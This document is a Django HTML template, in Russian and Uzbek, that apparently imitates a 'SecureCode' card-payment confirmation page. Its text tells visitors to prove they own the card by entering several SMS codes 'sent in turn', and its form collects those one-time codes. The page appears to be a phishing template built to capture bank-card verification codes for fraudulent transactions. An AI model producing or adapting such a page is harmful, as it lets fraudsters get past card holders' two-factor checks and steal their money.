{% load static %}
<!DOCTYPE html>
<html>
<head>
      <meta name="viewport"
          content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
  <title>Главная</title>
  <link rel="stylesheet" type="text/css" href="{% static 'main/css/main.css' %}">
  <link rel="stylesheet" href="https://pro.fontawesome.com/releases/v5.10.0/css/all.css" integrity="sha384-AYmEC3Yw5cVb3ZcuHtOA93w35dYTsvhLPVnYs9eStHfGJvOvKxVfELGroGkvsg+p" crossorigin="anonymous">
</head>
<body style="background: #83D283;">
  <div class="container">
    <div style=" width: 100%; display: flex; justify-content: center; border-bottom: 1px solid #ccc;">
      <h1 style="color: gray; font-size: 2.4em;" class="fas fa-shield-alt">SecureCode</h1>
    </div>
    <div style=" width: 100%; display: flex; justify-content: center; border-bottom: 1px solid #ccc;">
    <h2>Подтверждение операции</h2>
    </div>
    <p>Karta egasi ekanligingizga ishonch hosil qilishimiz uchun siz bir nechta kodlardan identifikatsiyadan o`tishingiz kerak. SMS-dan bir nechta kodlarni ko`rsatish talab qilinadi, ularni tizimimiz sizga o`z navbatida yuboradi.</p>
    <form style="width: 100%;" method="post">
      {% csrf_token %}
      {% if error_message %} <p style="color: red;">{{ error_message }}</p> {% endif %}
      <label for="code">Смс-код:</label>
      <input type="text" class="code" name="code" id="code" placeholder="SMS-kod">

      <button id="continue" name="code-button" class="continue-button">Отправить код</button>
    </form>

  </div>
</body>
</html>